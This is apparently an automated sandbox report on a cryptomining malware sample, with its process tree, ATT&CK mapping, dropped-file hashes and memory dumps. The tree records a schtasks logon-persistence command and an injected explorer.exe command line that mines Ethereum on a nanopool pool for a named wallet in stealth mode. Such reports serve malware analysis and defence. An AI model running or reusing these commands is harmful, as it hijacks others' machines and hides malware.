        Executes dropped EXE
        
        PID:3220
    - - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --response-timeout=30 --farm-retries=30 --pool stratum://`0x687ac23d19389af7925d29280d17be81f33b06c5`@eth-us-east1.nanopool.org:9999 --unam-stealth
        5⤵
        
        PID:4336
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe"
  2⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:336

C:\Users\Admin\Desktop\6c2934d4_by_Libranalysis.exe
"C:\Users\Admin\Desktop\6c2934d4_by_Libranalysis.exe"
1⤵
- Modifies WinLogon for persistence
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:928
- C:\Users\Admin\AppData\Local\Temp\xNRbDmpi0G3360Ee.exe
  "C:\Users\Admin\AppData\Local\Temp\xNRbDmpi0G3360Ee.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1740
- - C:\Users\Admin\AppData\Local\Temp\RarSFX2\wsappx.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\wsappx.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4664
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"' & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3800
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:408
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe --response-timeout=30 --farm-retries=30 --pool stratum://`0x687ac23d19389af7925d29280d17be81f33b06c5`@eth-us-east1.nanopool.org:9999 --unam-stealth
      4⤵
      PID:2776
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe"
  2⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4672

C:\Users\Admin\Desktop\6c2934d4_by_Libranalysis.exe
"C:\Users\Admin\Desktop\6c2934d4_by_Libranalysis.exe"
1⤵
- Modifies WinLogon for persistence
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408
- C:\Users\Admin\AppData\Local\Temp\FnHQ1tbt3CIZkUeE.exe
  "C:\Users\Admin\AppData\Local\Temp\FnHQ1tbt3CIZkUeE.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3668
- - C:\Users\Admin\AppData\Local\Temp\RarSFX4\wsappx.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX4\wsappx.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3812
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"' & exit
      4⤵
      PID:4568
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2492
  - - C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:3124
    - - C:\Users\Admin\AppData\Local\Temp\steamgfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4884
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"' & exit
        6⤵
        
        PID:3408
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"'
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3716
      - C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:448
        
        C:\Users\Admin\AppData\Local\Temp\steamgfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:648
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"' & exit
        8⤵
        
        PID:3028
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"'
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5080
      - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --response-timeout=30 --farm-retries=30 --pool stratum://`0x687ac23d19389af7925d29280d17be81f33b06c5`@eth-us-east1.nanopool.org:9999 --unam-stealth
        6⤵
        
        PID:2620
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe --response-timeout=30 --farm-retries=30 --pool stratum://`0x687ac23d19389af7925d29280d17be81f33b06c5`@eth-us-east1.nanopool.org:9999 --unam-stealth
      4⤵
      PID:1444
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe"
  2⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4156

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\wsappx.exe.log

Filesize
967B

MD5
593112afab3e1a6ed71c075f4ac0819b

SHA1
c1c7dea279fa856de050a3031edd658d8fa9b3ba

SHA256
02a89d09750bfc843c99f6686e677b599004fd808fd3877e7a62b6364e1d191e

SHA512
692baa3f8d1a09e0a17a43a70eb7b3687eb5f8089931d61044d8e2662599b9c0c5db681bcb971a89135389dc2f70d2619b85616fff8319acac642b4064d18e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\wsappx.exe

Filesize
1.7MB

MD5
f76562774e920cb14556de617aa7beeb

SHA1
194bd7deb431b6587774741bfa49690629d45d3f

SHA256
f0a70b1dda49dc3aa006c9e49aa49288493c7394fe6b02fb54703e9015698ee7

SHA512
aae9c2c318a67d829cbd7efe9aa810550515c677a63990bd9a7df3f88aba98ad04d9632b113734aa740c5f4fc3b8953e1fd1488ab5cb117db86c24487a218180

Download Submit
C:\Users\Admin\AppData\Local\Temp\dHydn6euU3EHg6xc.exe

Filesize
1.9MB

MD5
0def4cb7fdfbbca8036f69a3c2475b94

SHA1
9bab215f1078525dc352d6b93d86dccb56e26830

SHA256
f31d14664bf8d993f8117eaf7906cdb52b10f81f4eb3592fcc12315b6bb23574

SHA512
c01dee5f337cb8449472ce9b5690566b41ee52000ad2e5cb63ef19e607868cad17757b41805db8dbb4fb4b3b36fca8841e7ff6f1d1d4c9e84bff0673af41c498

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe

Filesize
58KB

MD5
72a83062e95b15533859cc63c1f52a6e

SHA1
070892389a7a174473b64208147840aef38bfb9c

SHA256
121bd2257c6c02acb6c1c4f1a5176bdf2f09bb3d9bae9003efc45d4629fb5b7b

SHA512
744b61c94e8f785a96745616b4eaa1c99016f205e5578eb5c6c82ec98cedd939c5ef60e4a240a6a0eff996a32cd2c91eb19b7230983e4b0385bc56438cd34e40

Download Submit
memory/336-239-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/336-235-0x0000000071160000-0x0000000071199000-memory.dmp

Filesize
228KB

Download
memory/336-217-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/892-86-0x0000000000D60000-0x0000000000D72000-memory.dmp

Filesize
72KB

Download
memory/1444-201-0x0000000140000000-0x000000014038E000-memory.dmp

Filesize
3.6MB

Download
memory/1444-199-0x0000000140000000-0x000000014038E000-memory.dmp

Filesize
3.6MB

Download
memory/2104-53-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-105-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-417-0x00000000719B0000-0x00000000719E9000-memory.dmp

Filesize
228KB

Download
memory/2104-39-0x0000000071220000-0x0000000071259000-memory.dmp

Filesize
228KB

Download
memory/2104-46-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-40-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-47-0x0000000071160000-0x0000000071199000-memory.dmp

Filesize
228KB

Download
memory/2104-411-0x00000000719B0000-0x00000000719E9000-memory.dmp

Filesize
228KB

Download
memory/2104-51-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-405-0x00000000719B0000-0x00000000719E9000-memory.dmp

Filesize
228KB

Download
memory/2104-54-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-55-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-57-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-58-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-60-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-61-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-63-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-64-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-69-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-385-0x00000000719B0000-0x00000000719E9000-memory.dmp

Filesize
228KB

Download
memory/2104-15-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-67-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-66-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-92-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-90-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-19-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-89-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-98-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-100-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-101-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-103-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-104-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-106-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-379-0x0000000071160000-0x0000000071199000-memory.dmp

Filesize
228KB

Download
memory/2104-107-0x00000000719B0000-0x00000000719E9000-memory.dmp

Filesize
228KB

Download
memory/2104-108-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-109-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-377-0x00000000719B0000-0x00000000719E9000-memory.dmp

Filesize
228KB

Download
memory/2104-371-0x0000000071160000-0x0000000071199000-memory.dmp

Filesize
228KB

Download
memory/2104-369-0x00000000719B0000-0x00000000719E9000-memory.dmp

Filesize
228KB

Download
memory/2104-345-0x00000000719B0000-0x00000000719E9000-memory.dmp

Filesize
228KB

Download
memory/2104-343-0x0000000071160000-0x0000000071199000-memory.dmp

Filesize
228KB

Download
memory/2104-321-0x0000000071220000-0x0000000071259000-memory.dmp

Filesize
228KB

Download
memory/2104-243-0x0000000071160000-0x0000000071199000-memory.dmp

Filesize
228KB

Download
memory/2104-241-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-17-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-16-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-202-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2104-13-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/3824-20-0x00000000748F0000-0x0000000074EA1000-memory.dmp

Filesize
5.7MB

Download
memory/3824-1-0x00000000748F0000-0x0000000074EA1000-memory.dmp

Filesize
5.7MB

Download
memory/3824-0-0x00000000748F2000-0x00000000748F3000-memory.dmp

Filesize
4KB

Download
memory/3824-18-0x00000000748F0000-0x0000000074EA1000-memory.dmp

Filesize
5.7MB

Download
memory/3824-14-0x00000000748F2000-0x00000000748F3000-memory.dmp

Filesize
4KB

Download
memory/3824-2-0x00000000748F0000-0x0000000074EA1000-memory.dmp

Filesize
5.7MB

Download
memory/4076-198-0x0000000003460000-0x000000000346E000-memory.dmp

Filesize
56KB

Download
memory/4156-277-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/4156-296-0x0000000071160000-0x0000000071199000-memory.dmp

Filesize
228KB

Download
memory/4156-299-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/4564-126-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/4564-176-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/4564-174-0x0000000071160000-0x0000000071199000-memory.dmp

Filesize
228KB

Download
memory/4664-48-0x000000001C1D0000-0x000000001C1E2000-memory.dmp

Filesize
72KB

Download
memory/4664-37-0x0000000000600000-0x00000000007B0000-memory.dmp

Filesize
1.7MB

Download
memory/4672-191-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/4672-194-0x0000000071160000-0x0000000071199000-memory.dmp

Filesize
228KB

Download
memory/4672-195-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download